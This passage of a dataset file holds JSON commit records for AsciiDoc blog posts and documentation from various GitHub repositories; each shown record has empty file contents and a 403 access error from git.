2016-08-03-Hello.adoc","repos":"ekroon\/ekroon.github.io,ekroon\/ekroon.github.io,ekroon\/ekroon.github.io","old_file":"_posts\/2016-08-03-Hello.adoc","new_file":"_posts\/2016-08-03-Hello.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ekroon\/ekroon.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5ce713b799222ee8d109c78281935edea434a50c","subject":"Update 2017-05-03-Intro.adoc","message":"Update 2017-05-03-Intro.adoc","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-05-03-Intro.adoc","new_file":"_posts\/2017-05-03-Intro.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3d756d7df09a8b9aeae99c61ac2239beb9dc2d51","subject":"Attempt link bug workaround","message":"Attempt link bug workaround\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Best practices\/Local design.adoc","new_file":"Best practices\/Local design.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"76a697d2c853e641a9b4c746e49a8bedd0cbdefe","subject":"Update 2017-05-11-Development-Environment.adoc","message":"Update 
2017-05-11-Development-Environment.adoc","repos":"ioisup\/ioisup.github.io,ioisup\/ioisup.github.io,ioisup\/ioisup.github.io,ioisup\/ioisup.github.io","old_file":"_posts\/2017-05-11-Development-Environment.adoc","new_file":"_posts\/2017-05-11-Development-Environment.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ioisup\/ioisup.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8ad74253058e64163e53104d9ea574c41978dca0","subject":"Update 2017-05-24-Welcome.adoc","message":"Update 2017-05-24-Welcome.adoc","repos":"siliconhbo\/siliconhbo.github.io,siliconhbo\/siliconhbo.github.io,siliconhbo\/siliconhbo.github.io,siliconhbo\/siliconhbo.github.io","old_file":"_posts\/2017-05-24-Welcome.adoc","new_file":"_posts\/2017-05-24-Welcome.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/siliconhbo\/siliconhbo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a20b3db26cb33fc533f531a3b2f9f520d01ff569","subject":"Update 2015-07-29-Hibernate.adoc","message":"Update 2015-07-29-Hibernate.adoc","repos":"jmnarloch\/blog.io,jmnarloch\/blog.io,jmnarloch\/blog.io","old_file":"_posts\/2015-07-29-Hibernate.adoc","new_file":"_posts\/2015-07-29-Hibernate.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jmnarloch\/blog.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"938b6f29f97ca924e17ac9a1790d57f6729a15e3","subject":"Update 2016-12-22-Larastudy.adoc","message":"Update 2016-12-22-Larastudy.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-22-Larastudy.adoc","new_file":"_posts\/2016-12-22-Larastudy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"46be46e64b94b94d4fec81964deae3e458420734","subject":"y2b create post Samsung Galaxy Tab 10.1 Unboxing","message":"y2b create post Samsung Galaxy Tab 10.1 Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-07-04-Samsung-Galaxy-Tab-101-Unboxing.adoc","new_file":"_posts\/2011-07-04-Samsung-Galaxy-Tab-101-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d16b245c8a8396ff2e6ca6861ee57a9168ca15da","subject":"Update 2015-06-05-Es-ist-die-Donutwelt.adoc","message":"Update 2015-06-05-Es-ist-die-Donutwelt.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-06-05-Es-ist-die-Donutwelt.adoc","new_file":"_posts\/2015-06-05-Es-ist-die-Donutwelt.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"30c43f7390939686aefc9d4f7259e4b59a0627c0","subject":"Update 2015-10-10-Space-Quest.adoc","message":"Update 2015-10-10-Space-Quest.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2015-10-10-Space-Quest.adoc","new_file":"_posts\/2015-10-10-Space-Quest.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ff842a2ab29098adba4c327807d52dab1694c0fb","subject":"Added mathjax information to ipython_post_setup.","message":"Added mathjax information to ipython_post_setup.\n","repos":"lowcloudnine\/singularity-spark,lowcloudnine\/singularity-spark","old_file":"docs\/ipython_post_setup.adoc","new_file":"docs\/ipython_post_setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lowcloudnine\/singularity-spark.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"85aee2ec58e167b77ae17d36c4649bc625ca2b45","subject":"Update 2015-09-20-Python-re-module.adoc","message":"Update 2015-09-20-Python-re-module.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-20-Python-re-module.adoc","new_file":"_posts\/2015-09-20-Python-re-module.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d90ffd3a57f84df71c796d1be5190726f9027499","subject":"Update 2017-05-24-Episode-100-Szas.adoc","message":"Update 2017-05-24-Episode-100-Szas.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2017-05-24-Episode-100-Szas.adoc","new_file":"_posts\/2017-05-24-Episode-100-Szas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aa1b924b1d3adea58593ec7c4a7f34a4c0173c20","subject":"Delete the file at '_posts\/2019-01-31-My-English-Title.adoc'","message":"Delete the file at '_posts\/2019-01-31-My-English-Title.adoc'","repos":"akhmetgali\/hubpress.io,akhmetgali\/hubpress.io,akhmetgali\/hubpress.io,akhmetgali\/hubpress.io","old_file":"_posts\/2019-01-31-My-English-Title.adoc","new_file":"_posts\/2019-01-31-My-English-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/akhmetgali\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2e2e8cb5585aa2eee706f0f09beb962524bd7193","subject":"Update 2017-08-14-Cloud-Spanner.adoc","message":"Update 2017-08-14-Cloud-Spanner.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-14-Cloud-Spanner.adoc","new_file":"_posts\/2017-08-14-Cloud-Spanner.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"09e5863c86710b2a9956579c956481a8975b2df5","subject":"May Release (#402)","message":"May Release (#402)\n\nMay release post","repos":"clojure\/clojurescript-site","old_file":"content\/news\/2022-05-13-release.adoc","new_file":"content\/news\/2022-05-13-release.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojurescript-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"036668ce37a52acdd425e231fad881f55bbc4a92","subject":"Update 2016-04-28-Word-Press-1.adoc","message":"Update 2016-04-28-Word-Press-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-04-28-Word-Press-1.adoc","new_file":"_posts\/2016-04-28-Word-Press-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"49a21617dac70771648e3422a12c9458030e35f7","subject":"Update 2016-11-3-you-know-what.adoc","message":"Update 2016-11-3-you-know-what.adoc","repos":"fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io","old_file":"_posts\/2016-11-3-you-know-what.adoc","new_file":"_posts\/2016-11-3-you-know-what.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fauzanooor\/fauzanooor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a5b02e0e1b4f5b4eb0fc3672b8eecc86fb7c8ce0","subject":"Adding API document","message":"Adding API document\n","repos":"vaadin\/angular2-polymer,vaadin\/angular2-polymer,platosha\/angular-polymer,platosha\/angular-polymer,platosha\/angular-polymer","old_file":"docs\/api.adoc","new_file":"docs\/api.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vaadin\/angular2-polymer.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b9a8a4de4e6ff8df66be49127ce681abce79a1b4","subject":"updating Docker version","message":"updating Docker version\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch02-basic-concepts.adoc","new_file":"developer-tools\/java\/chapters\/ch02-basic-concepts.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c2a3f34ea3c85c29b8b595ea540aec42e41258bb","subject":"job #11937 - Implementation note","message":"job #11937 - Implementation note\n\nNote that this note was created in a separate branch from the 
work.\n","repos":"rmulvey\/bridgepoint,rmulvey\/bridgepoint,travislondon\/bridgepoint,leviathan747\/bridgepoint,rmulvey\/bridgepoint,keithbrown\/bridgepoint,travislondon\/bridgepoint,leviathan747\/bridgepoint,leviathan747\/bridgepoint,keithbrown\/bridgepoint,lwriemen\/bridgepoint,travislondon\/bridgepoint,keithbrown\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,lwriemen\/bridgepoint,rmulvey\/bridgepoint,lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,lwriemen\/bridgepoint,lwriemen\/bridgepoint,keithbrown\/bridgepoint,keithbrown\/bridgepoint,leviathan747\/bridgepoint,keithbrown\/bridgepoint,cortlandstarrett\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,travislondon\/bridgepoint,travislondon\/bridgepoint,xtuml\/bridgepoint,travislondon\/bridgepoint,cortlandstarrett\/bridgepoint,leviathan747\/bridgepoint,rmulvey\/bridgepoint,cortlandstarrett\/bridgepoint,travislondon\/bridgepoint,rmulvey\/bridgepoint,rmulvey\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,travislondon\/bridgepoint,leviathan747\/bridgepoint,keithbrown\/bridgepoint,leviathan747\/bridgepoint,xtuml\/bridgepoint","old_file":"doc-bridgepoint\/notes\/11937_epoch\/11937_epoch_int.adoc","new_file":"doc-bridgepoint\/notes\/11937_epoch\/11937_epoch_int.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xtuml\/bridgepoint.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b5f5665ea638a5a4d53b584defef2557a9353a85","subject":"SEC-2463: CSRF documentation includes EnableWebMvcSecurity","message":"SEC-2463: CSRF documentation includes 
EnableWebMvcSecurity\n","repos":"Krasnyanskiy\/spring-security,yinhe402\/spring-security,SanjayUser\/SpringSecurityPro,zshift\/spring-security,driftman\/spring-security,tekul\/spring-security,xingguang2013\/spring-security,forestqqqq\/spring-security,vitorgv\/spring-security,olezhuravlev\/spring-security,vitorgv\/spring-security,mrkingybc\/spring-security,jmnarloch\/spring-security,rwinch\/spring-security,mounb\/spring-security,jgrandja\/spring-security,diegofernandes\/spring-security,caiwenshu\/spring-security,mounb\/spring-security,jmnarloch\/spring-security,diegofernandes\/spring-security,Krasnyanskiy\/spring-security,zhaoqin102\/spring-security,pwheel\/spring-security,kazuki43zoo\/spring-security,hippostar\/spring-security,forestqqqq\/spring-security,jgrandja\/spring-security,yinhe402\/spring-security,SanjayUser\/SpringSecurityPro,olezhuravlev\/spring-security,cyratech\/spring-security,xingguang2013\/spring-security,mounb\/spring-security,zgscwjm\/spring-security,Krasnyanskiy\/spring-security,pkdevbox\/spring-security,wkorando\/spring-security,cyratech\/spring-security,liuguohua\/spring-security,forestqqqq\/spring-security,hippostar\/spring-security,kazuki43zoo\/spring-security,mparaz\/spring-security,panchenko\/spring-security,liuguohua\/spring-security,zhaoqin102\/spring-security,mparaz\/spring-security,ractive\/spring-security,vitorgv\/spring-security,rwinch\/spring-security,eddumelendez\/spring-security,zhaoqin102\/spring-security,diegofernandes\/spring-security,fhanik\/spring-security,follow99\/spring-security,izeye\/spring-security,cyratech\/spring-security,Xcorpio\/spring-security,olezhuravlev\/spring-security,MatthiasWinzeler\/spring-security,thomasdarimont\/spring-security,Xcorpio\/spring-security,thomasdarimont\/spring-security,wilkinsona\/spring-security,Peter32\/spring-security,eddumelendez\/spring-security,xingguang2013\/spring-security,wkorando\/spring-security,SanjayUser\/SpringSecurityPro,ractive\/spring-security,ollie314\/spring-security,fhanik\/spring-security,zshift\/spring-security,driftman\/spring-security,zgscwjm\/spring-security,liuguohua\/spring-security,panchenko\/spring-security,MatthiasWinzeler\/spring-security,wilkinsona\/spring-security,rwinch\/spring-security,spring-projects\/spring-security,thomasdarimont\/spring-security,kazuki43zoo\/spring-security,zhaoqin102\/spring-security,eddumelendez\/spring-security,ractive\/spring-security,cyratech\/spring-security,raindev\/spring-security,caiwenshu\/spring-security,mparaz\/spring-security,djechelon\/spring-security,jmnarloch\/spring-security,tekul\/spring-security,yinhe402\/spring-security,tekul\/spring-security,driftman\/spring-security,izeye\/spring-security,follow99\/spring-security,forestqqqq\/spring-security,mdeinum\/spring-security,panchenko\/spring-security,wkorando\/spring-security,djechelon\/spring-security,chinazhaoht\/spring-security,Krasnyanskiy\/spring-security,jgrandja\/spring-security,follow99\/spring-security,chinazhaoht\/spring-security,zgscwjm\/spring-security,olezhuravlev\/spring-security,kazuki43zoo\/spring-security,Peter32\/spring-security,adairtaosy\/spring-security,likaiwalkman\/spring-security,likaiwalkman\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,Peter32\/spring-security,zshift\/spring-security,hippostar\/spring-security,raindev\/spring-security,vitorgv\/spring-security,rwinch\/spring-security,follow99\/spring-security,SanjayUser\/SpringSecurityPro,fhanik\/spring-security,djechelon\/spring-security,caiwenshu\/spring-security,mdeinum\/spring-securit
y,thomasdarimont\/spring-security,MatthiasWinzeler\/spring-security,djechelon\/spring-security,ollie314\/spring-security,fhanik\/spring-security,spring-projects\/spring-security,ollie314\/spring-security,mdeinum\/spring-security,Xcorpio\/spring-security,ractive\/spring-security,olezhuravlev\/spring-security,rwinch\/spring-security,likaiwalkman\/spring-security,pwheel\/spring-security,fhanik\/spring-security,tekul\/spring-security,pwheel\/spring-security,djechelon\/spring-security,izeye\/spring-security,eddumelendez\/spring-security,likaiwalkman\/spring-security,adairtaosy\/spring-security,jgrandja\/spring-security,raindev\/spring-security,izeye\/spring-security,pwheel\/spring-security,adairtaosy\/spring-security,mdeinum\/spring-security,diegofernandes\/spring-security,spring-projects\/spring-security,ajdinhedzic\/spring-security,ajdinhedzic\/spring-security,raindev\/spring-security,adairtaosy\/spring-security,SanjayUser\/SpringSecurityPro,ajdinhedzic\/spring-security,wkorando\/spring-security,wilkinsona\/spring-security,jmnarloch\/spring-security,ollie314\/spring-security,mounb\/spring-security,MatthiasWinzeler\/spring-security,chinazhaoht\/spring-security,hippostar\/spring-security,spring-projects\/spring-security,mrkingybc\/spring-security,Xcorpio\/spring-security,spring-projects\/spring-security,mrkingybc\/spring-security,fhanik\/spring-security,jgrandja\/spring-security,eddumelendez\/spring-security,jgrandja\/spring-security,wilkinsona\/spring-security,pwheel\/spring-security,Peter32\/spring-security,zgscwjm\/spring-security,panchenko\/spring-security,pkdevbox\/spring-security,pkdevbox\/spring-security,xingguang2013\/spring-security,pkdevbox\/spring-security,mrkingybc\/spring-security,kazuki43zoo\/spring-security,liuguohua\/spring-security,rwinch\/spring-security,caiwenshu\/spring-security,zshift\/spring-security,ajdinhedzic\/spring-security,mparaz\/spring-security,thomasdarimont\/spring-security,driftman\/spring-security,chinazhaoht\/spring-security,yinhe402\/spring-security","old_file":"docs\/manual\/src\/asciidoc\/index.adoc","new_file":"docs\/manual\/src\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jmnarloch\/spring-security.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0071345a918f939c48f89e000fc7da2dd934940f","subject":"Dependencies","message":"Dependencies\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"JAX-RS client.adoc","new_file":"JAX-RS client.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"53ab9014e633b4b69ea91aa4d49f8fe81ada4dbc","subject":"We are hiring - 48788","message":"We are hiring - 
48788\n","repos":"objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,hawkular\/hawkular.github.io,tsegismont\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,jsanda\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,jsanda\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,jsanda\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,jsanda\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,tsegismont\/hawkular.github.io,tsegismont\/hawkular.github.io,pilhuhn\/hawkular.github.io,tsegismont\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2016\/01\/05\/we-are-hiring.adoc","new_file":"src\/main\/jbake\/content\/blog\/2016\/01\/05\/we-are-hiring.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2f2f6201963c6d73e81db8b853269bfa12e4a00d","subject":"Update 2016-07-08-Word-Press-3.adoc","message":"Update 2016-07-08-Word-Press-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-08-Word-Press-3.adoc","new_file":"_posts\/2016-07-08-Word-Press-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9bc6bfab6f5fd6f355d5c3fbfb7d2c2f0df9f0ba","subject":"Update 2016-01-14-ElasticSearchrails.adoc","message":"Update 2016-01-14-ElasticSearchrails.adoc","repos":"regdog\/regdog.github.io,regdog\/regdog.github.io,regdog\/regdog.github.io","old_file":"_posts\/2016-01-14-ElasticSearchrails.adoc","new_file":"_posts\/2016-01-14-ElasticSearchrails.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/regdog\/regdog.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"25d73f4aed5a84e590a2583d9fdc891ef1f2f9fe","subject":"Update 2016-03-02-A-Painted-On-Smile.adoc","message":"Update 2016-03-02-A-Painted-On-Smile.adoc","repos":"johannewinwood\/johannewinwood.github.io,johannewinwood\/johannewinwood.github.io,johannewinwood\/johannewinwood.github.io,johannewinwood\/johannewinwood.github.io","old_file":"_posts\/2016-03-02-A-Painted-On-Smile.adoc","new_file":"_posts\/2016-03-02-A-Painted-On-Smile.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/johannewinwood\/johannewinwood.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"750881848d57f55d0bec7832e6028616d135db1b","subject":"Update 2017-01-13-memo-like-asciidoc.adoc","message":"Update 
2017-01-13-memo-like-asciidoc.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-13-memo-like-asciidoc.adoc","new_file":"_posts\/2017-01-13-memo-like-asciidoc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0604861db991f64caf21b59d7b366640084b6492","subject":"Update 2017-08-07-Fun-With-Asteroids.adoc","message":"Update 2017-08-07-Fun-With-Asteroids.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2017-08-07-Fun-With-Asteroids.adoc","new_file":"_posts\/2017-08-07-Fun-With-Asteroids.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"878361e43d61c46d495b141413f4358ddabdac2e","subject":"Update 2018-08-25-Laravel56-Response.adoc","message":"Update 2018-08-25-Laravel56-Response.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"40741a2675dbb4fc54befd6f78dfb647284ff627","subject":"Update 2015-09-14-Never-can-go.adoc","message":"Update 2015-09-14-Never-can-go.adoc","repos":"whelamc\/life,whelamc\/life,whelamc\/life","old_file":"_posts\/2015-09-14-Never-can-go.adoc","new_file":"_posts\/2015-09-14-Never-can-go.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/whelamc\/life.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9d2d6ce0b28a6e0659cf9bb01c58efc7df8500d7","subject":"Update 2017-04-29-Quick-update.adoc","message":"Update 2017-04-29-Quick-update.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-04-29-Quick-update.adoc","new_file":"_posts\/2017-04-29-Quick-update.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3e1a09c789c9e9ff53b8bb4df3857ad158136e28","subject":"Publish 2098-1-1-Puzzle-3-Hack-Me-Baby.adoc","message":"Publish 2098-1-1-Puzzle-3-Hack-Me-Baby.adoc","repos":"puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io","old_file":"2098-1-1-Puzzle-3-Hack-Me-Baby.adoc","new_file":"2098-1-1-Puzzle-3-Hack-Me-Baby.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/puzzles-engineer\/puzzles-engineer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"88a4e6c740ebf0440f4bfe232a6088b4419b9f6c","subject":"Translate readme to asciidoc","message":"Translate readme to asciidoc\n","repos":"endragor\/Nim,haiodo\/Nim,greyanubis\/Nim,jfhg\/Nim,Salafit\/Nim,jfhg\/Nim,tmm1\/Nim,singularperturbation\/Nim,haiodo\/Nim,judofyr\/Nim,sferik\/Nim,nafsaka\/Nim,fredericksilva\/Nim,zachaysan\/Nim,jsanjuas\/Nim,endragor\/Nim,msmith491\/Nim,Dhertz\/Nim,tmm1\/Nim,fredericksilva\/Nim,fredericksilva\/Nim,Senketsu\/Nim,nimLuckyBull\/Nim,JCavallo\/Nim,nanoant\/Nim,Dhertz\/Nim,Senketsu\/Nim,jsanjuas\/Nim,nafsaka\/Nim,nafsaka\/Nim,endragor\/Nim,douglas-larocca\/Nim,mbaulch\/Nim,judofyr\/Nim,sarvex\/Nim-lang,jfhg\/Nim,Dhertz\/Nim,Salafit\/Nim,Dhertz\/Nim,sarvex\/Nim-lang,reactormonk\/nim,BlaXpirit\/nre,fredericksilva\/Nim,Salafit\/Nim,sarvex\/Nim-lang,Senketsu\/Nim,sferik\/Nim,Salafit\/Nim,russpowers\/Nim,reactormonk\/nim,reactormonk\/nim,mbaulch\/Nim,fmamud\/Nim,jsanjuas\/Nim,haiodo\/Nim,tulayang\/Nim,dom96\/Nim,JCavallo\/Nim,JCavallo\/Nim,sarvex\/Nim-lang,greyanubis\/Nim,tulayang\/Nim,greyanubis\/Nim,fmamud\/Nim,zachaysan\/Nim,singularperturbation\/Nim,xland\/Nim,nimLuckyBull\/Nim,endragor\/Nim,tmm1\/Nim,douglas-larocca\/Nim,tmm1\/Nim,douglas-larocca\/Nim,russpowers\/Nim,xland\/Nim,msmith491\/Nim,haiodo\/Nim,bvssvni\/Nim,nimLuckyBull\/Nim,douglas-larocca\/Nim,endragor\/Nim,nanoant\/Nim,jfhg\/Nim,judofyr\/Nim,singularperturbation\/Nim,sarvex\/Nim-lang,jsanjuas\/Nim,zachaysan\/Nim,bvssvni\/Nim,russpowers\/Nim,sferik\/Nim,endragor\/Nim,nimLuckyBull\/Nim,Matt14916\/Nim,judofyr\/Nim,haiodo\/Nim,douglas-larocca\/Nim,tulayang\/Nim,endragor\/Nim,tulayang\/Nim,fredericksilva\/Nim,haiodo\/Nim,singularperturbation\/Nim,Salafit\/Nim,BlaXpirit\/nre,jsanjuas\/Nim,nanoant\/Nim,tulayang\/Nim,Matt14916\/Nim,msmith491\/Nim,bvssvni\/Nim,greyanubis\/Nim,Salafit\/Nim,reactormonk\/nim,dom96\/Nim,mbaulch\/Nim,tmm1\/Nim,nafsaka\/Nim,sarvex\/Nim-lang,msmith491\/